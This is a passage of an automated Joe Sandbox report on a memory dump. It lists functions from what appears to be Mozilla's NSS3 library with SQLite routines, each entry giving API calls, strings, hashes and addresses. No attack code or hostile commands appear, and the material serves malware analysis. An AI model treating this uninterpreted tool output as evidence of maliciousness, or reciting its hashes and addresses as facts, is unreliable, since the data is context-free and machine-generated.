9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C543022, 6C543156, 6C543162, 6C54318A, 6C543196, 6C5431A2, 6C5431AE, 6C5431BA, 6C5431C6
database corruption, xrefs: 6C54316C

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: 840afea39ff151903180a42e77e06d82fff863a00575de3cf615947ef014faf1
Instruction ID: 227af2b551de55a055aa907158348e132086744ecdff750bbcbfcfef257a0439
Opcode Fuzzy Hash: 840afea39ff151903180a42e77e06d82fff863a00575de3cf615947ef014faf1
Instruction Fuzzy Hash: A3B1AE70E05219DBDB08CF9DCC85AEEB7B1BF48304F14846AE849B7B51D774A942CBA4

Function 6C592D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C592D69

Strings

winUnmapfile2, xrefs: 6C592F7F
winSeekFile, xrefs: 6C592E9C
kl, xrefs: 6C592DD0
winUnmapfile1, xrefs: 6C592F55
winTruncate2, xrefs: 6C592EF8
Pkl, xrefs: 6C592E74, 6C592EC5, 6C592F32, 6C592F5C
@kl, xrefs: 6C592E24
winTruncate1, xrefs: 6C592EBE

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: __allrem
String ID: @kl$Pkl$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$kl
API String ID: 2933888876-1118074720
Opcode ID: 621cea46661fa95a5d4e390643d30bfa0668c6eb551038a1ea539d7ea98f3291
Instruction ID: 31e6b1b70d17abfccef8034e866fec952b70e3f142682bed0269eab2780b81a6
Opcode Fuzzy Hash: 621cea46661fa95a5d4e390643d30bfa0668c6eb551038a1ea539d7ea98f3291
Instruction Fuzzy Hash: 72619D71B012059FDB04CF68DC88A6A7BB2FB49314F10856DE91AAB790DB31AD06CB95

Function 6C617F90 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

PR_GetMonitorEntryCount.NSS3(?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C617FB2

Part of subcall function 6C59BA40: TlsGetValue.KERNEL32 ref: 6C59BA51
Part of subcall function 6C59BA40: TlsGetValue.KERNEL32 ref: 6C59BA6B
Part of subcall function 6C59BA40: EnterCriticalSection.KERNEL32 ref: 6C59BA83
Part of subcall function 6C59BA40: TlsGetValue.KERNEL32 ref: 6C59BAA1
Part of subcall function 6C59BA40: _PR_MD_UNLOCK.NSS3 ref: 6C59BAC0

PR_EnterMonitor.NSS3(?,?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C617FD4

Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690AB
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690C9
Part of subcall function 6C669090: EnterCriticalSection.KERNEL32 ref: 6C6690E5
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C669116
Part of subcall function 6C669090: LeaveCriticalSection.KERNEL32 ref: 6C66913F

Part of subcall function 6C619430: PR_SetError.NSS3(FFFFD0AC,00000000), ref: 6C619466

PR_ExitMonitor.NSS3(?), ref: 6C61801B
PR_EnterMonitor.NSS3(?), ref: 6C618034
TlsGetValue.KERNEL32 ref: 6C6180A2
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6180C0
PR_ExitMonitor.NSS3(?), ref: 6C61811C
PR_ExitMonitor.NSS3(?), ref: 6C618134

Strings

), xrefs: 6C6180DB

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$Monitor$Enter$CriticalExitSection$Error$CountEntryLeave
String ID: )
API String ID: 3537756449-2427484129
Opcode ID: 412926d5f7ad3aca2116e5a87068e6960a65c3cfbb7590f1f314cce7c94a5c92
Instruction ID: bfd4ce1b926718abc61da05471d0f3772fe434216fb1a89408a133c6ac10a27f
Opcode Fuzzy Hash: 412926d5f7ad3aca2116e5a87068e6960a65c3cfbb7590f1f314cce7c94a5c92
Instruction Fuzzy Hash: 23513472A083059AE7109B39CC017EB77B0AF5A31EF054529DD5942E61EB31A508C78E

Function 6C5BFCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON

Download Yara Rule

APIs

PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C5BFCBD
strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C5BFCCC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C5BFCEF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5BFD32
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C5BFD46
PORT_Alloc_Util.NSS3(00000001), ref: 6C5BFD51
memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C5BFD6D
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5BFD84

Strings

:, xrefs: 6C5BFD78

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
String ID: :
API String ID: 183580322-336475711
Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction ID: a952af62b2b9bda8c6a4c602d6355cea9c5ecf4e278dd7b297b0798774cbe875
Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction Fuzzy Hash: E031B1BE9002159FEB008AA8DC157AF7BA8AF55318F250634DD14B7B00E772E918C7D6

Function 6C5A0F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C5A0F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C5A0F84

Part of subcall function 6C5FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6D18D0,?), ref: 6C5FB095

SEC_QuickDERDecodeItem_Util.NSS3(?,6C5BF59B,6C6C890C,?), ref: 6C5A0FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C5A0FC1

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C5A0FDB
PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C5A0FEF
PL_FreeArenaPool.NSS3(?), ref: 6C5A1001
PL_FinishArenaPool.NSS3(?), ref: 6C5A1009

Strings

security, xrefs: 6C5A0F5C

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: b365cd85ff6f6968c6957bedd63a09513deac6fa7763380b76e2981776d69847
Instruction ID: 54d4723cb1fbb1dc8af084f29410ae6b4761c8788baa63a1e4a946dae238972a
Opcode Fuzzy Hash: b365cd85ff6f6968c6957bedd63a09513deac6fa7763380b76e2981776d69847
Instruction Fuzzy Hash: 142128B1A04204ABE700DF25DD41AAF77B4EF8925CF048519FC18A7601FB31D956CBD6

Function 6C5A6DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C5A7D8F,6C5A7D8F,?,?), ref: 6C5A6DC8

Part of subcall function 6C5FFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C5FFE08
Part of subcall function 6C5FFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C5FFE1D
Part of subcall function 6C5FFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C5FFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C5A7D8F,?,?), ref: 6C5A6DD5

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C6C8FA0,00000000,?,?,?,?,6C5A7D8F,?,?), ref: 6C5A6DF7

Part of subcall function 6C5FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6D18D0,?), ref: 6C5FB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C5A6E35

Part of subcall function 6C5FFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C5FFE29
Part of subcall function 6C5FFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C5FFE3D
Part of subcall function 6C5FFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C5FFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C5A6E4C

Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C6C8FE0,00000000), ref: 6C5A6E82

Part of subcall function 6C5A6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C5AB21D,00000000,00000000,6C5AB219,?,6C5A6BFB,00000000,?,00000000,00000000,?,?,?,6C5AB21D), ref: 6C5A6B01
Part of subcall function 6C5A6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C5A6B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C5A6F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C5A6F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C6C8FE0,00000000), ref: 6C5A6F6B
PR_SetError.NSS3(FFFFE005,00000000,6C5A7D8F,?,?), ref: 6C5A6FE1

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: 606de505c8f1a90b2c1028e0cadb01cb494376e7a309caa8cc17d5b4574fdc90
Instruction ID: 85bf530fcfdfffcd2210a872173689840ff28af93410a5f554e142550c8c64bb
Opcode Fuzzy Hash: 606de505c8f1a90b2c1028e0cadb01cb494376e7a309caa8cc17d5b4574fdc90
Instruction Fuzzy Hash: 58716F71E107469BDB00CF5ACD40AAE7BA4BF99348F154229E818D7B11FB70E996CB90

Function 6C5E0FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5E1057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5E1085
PK11_GetAllTokens.NSS3 ref: 6C5E10B1
free.MOZGLUE(?), ref: 6C5E1107
PR_SetError.NSS3(00000000,00000000), ref: 6C5E1172
free.MOZGLUE(?), ref: 6C5E1182
free.MOZGLUE(?), ref: 6C5E11A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C5E11C5

Part of subcall function 6C5E52C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C5BEAC5,00000001), ref: 6C5E52DF
Part of subcall function 6C5E52C0: EnterCriticalSection.KERNEL32(?), ref: 6C5E52F3
Part of subcall function 6C5E52C0: PR_Unlock.NSS3(?), ref: 6C5E5358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C5E11D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C5E11F3

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: 7db296795660777e30375e46a2297c8abe1f543c0f29710cd2eea4845ba26fb2
Instruction ID: f4026e03bd05930fdb54126d757cb2b796a5a11b30dd68e6308968c24836c0ba
Opcode Fuzzy Hash: 7db296795660777e30375e46a2297c8abe1f543c0f29710cd2eea4845ba26fb2
Instruction Fuzzy Hash: 7161A1B0E003459BEB04DF65DC81B9BBBB5AF49348F144128E819AB742EB31E945CB65

Function 6C5EADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAE10
EnterCriticalSection.KERNEL32(?,?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C5CD079,00000000,00000001), ref: 6C5EAE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAE7F
TlsGetValue.KERNEL32(?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAEF1
free.MOZGLUE(6C5CCDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5CCDBB,?), ref: 6C5EAF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C5CCDBB,?,6C5CD079,00000000,00000001), ref: 6C5EAF30

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: a6cb4a5b0753a82278cfd8eee3d15e61f1e59ecc1b66872dc8500b719b913a95
Instruction ID: 11d4ecb5a5f760c6f8bd147fec43c81727ad59be68c13d6c8deafacb7529f13f
Opcode Fuzzy Hash: a6cb4a5b0753a82278cfd8eee3d15e61f1e59ecc1b66872dc8500b719b913a95
Instruction Fuzzy Hash: D0517BB5A00602AFDB01DF29DC84B5ABBB4BF49318F1446A5E81997E11E731E8A4CBD1

Function 6C5C4CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C5CAB7F,?,00000000,?), ref: 6C5C4CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C5CAB7F,?,00000000,?), ref: 6C5C4CC8
TlsGetValue.KERNEL32(?,6C5CAB7F,?,00000000,?), ref: 6C5C4CE0
EnterCriticalSection.KERNEL32(?,?,6C5CAB7F,?,00000000,?), ref: 6C5C4CF4
PL_HashTableLookup.NSS3(?,?,?,6C5CAB7F,?,00000000,?), ref: 6C5C4D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C5C4D10

Part of subcall function 6C64DD70: TlsGetValue.KERNEL32 ref: 6C64DD8C
Part of subcall function 6C64DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DDB4

PR_Now.NSS3(?,00000000,?), ref: 6C5C4D26

Part of subcall function 6C669DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C6B0A27), ref: 6C669DC6
Part of subcall function 6C669DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C6B0A27), ref: 6C669DD1
Part of subcall function 6C669DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C669DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C5C4D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C5C4DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C5C4E02

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: cc65ca0c0bccb79d0ddb12d2ce6a4e07d47d7c740cd15b23d90f4f0375f95127
Instruction ID: a5eace9d82c21ba196e86fbf71ed7cf7aff338c85e89c2d8cbcefd8706ddc815
Opcode Fuzzy Hash: cc65ca0c0bccb79d0ddb12d2ce6a4e07d47d7c740cd15b23d90f4f0375f95127
Instruction Fuzzy Hash: E641D8B5B00105ABEB00AF68EC80D667BB8AF56318F048574EC0997B12EB31DD14C7D3

Function 6C5ABFF0 Relevance: 15.1, APIs: 10, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C5ABFFB

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000018C), ref: 6C5AC015

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

memset.VCRUNTIME140(-00000004,00000000,00000188), ref: 6C5AC032
DER_SetUInteger.NSS3(00000000,00000078,00000000), ref: 6C5AC04D

Part of subcall function 6C5F69E0: PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C5F6A47
Part of subcall function 6C5F69E0: memcpy.VCRUNTIME140(00000000,-00000005,00000001), ref: 6C5F6A64

DER_SetUInteger.NSS3(00000000,00000084,?), ref: 6C5AC064
CERT_CopyName.NSS3(00000000,000000A8,?), ref: 6C5AC07B

Part of subcall function 6C5A8980: PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6C5A7310), ref: 6C5A89B8
Part of subcall function 6C5A8980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6C5A7310), ref: 6C5A89E6
Part of subcall function 6C5A8980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6C5A8A00
Part of subcall function 6C5A8980: CERT_CopyRDN.NSS3(00000004,00000000,6C5A7310,?,?,00000004,?), ref: 6C5A8A1B
Part of subcall function 6C5A8980: PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6C5A8A74

Part of subcall function 6C5A1D10: PORT_FreeArena_Util.NSS3(000000B0,00000000,00000000,00000000,00000000,?,6C5AC097,00000000,000000B0,?), ref: 6C5A1D2C
Part of subcall function 6C5A1D10: SECITEM_CopyItem_Util.NSS3(000000B0,00000004,6C5AC09B,00000000,00000000,00000000,?,6C5AC097,00000000,000000B0,?), ref: 6C5A1D3F
Part of subcall function 6C5A1D10: SECITEM_CopyItem_Util.NSS3(000000B0,-00000010,6C5AC087,00000000,000000B0,?), ref: 6C5A1D54

CERT_CopyName.NSS3(00000000,000000CC,?), ref: 6C5AC0AD
SECKEY_CopySubjectPublicKeyInfo.NSS3(00000000,-000000D4,?), ref: 6C5AC0C9

Part of subcall function 6C5B2DD0: SECOID_CopyAlgorithmID_Util.NSS3(-000000D4,-00000004,6C5AC0D2,6C5AC0CE,00000000,-000000D4,?), ref: 6C5B2DF5
Part of subcall function 6C5B2DD0: SECITEM_CopyItem_Util.NSS3(-000000D4,-0000001C,?,?,?,?,6C5AC0CE,00000000,-000000D4,?), ref: 6C5B2E27

CERT_DestroyCertificate.NSS3(00000000), ref: 6C5AC0D6
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5AC0E3

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Copy$Arena$Alloc_Arena_$FreeItem_$IntegerNameValue$AlgorithmAllocateCertificateCriticalDestroyEnterGrow_InfoInitLockPoolPublicSectionSubjectUnlockcallocmemcpymemset
String ID:
API String ID: 3955726912-0
Opcode ID: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
Instruction ID: bdf86b7a7b523a939ae473e9df8efb01604e6004fc0c61ec1b79455f4a6d8262
Opcode Fuzzy Hash: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
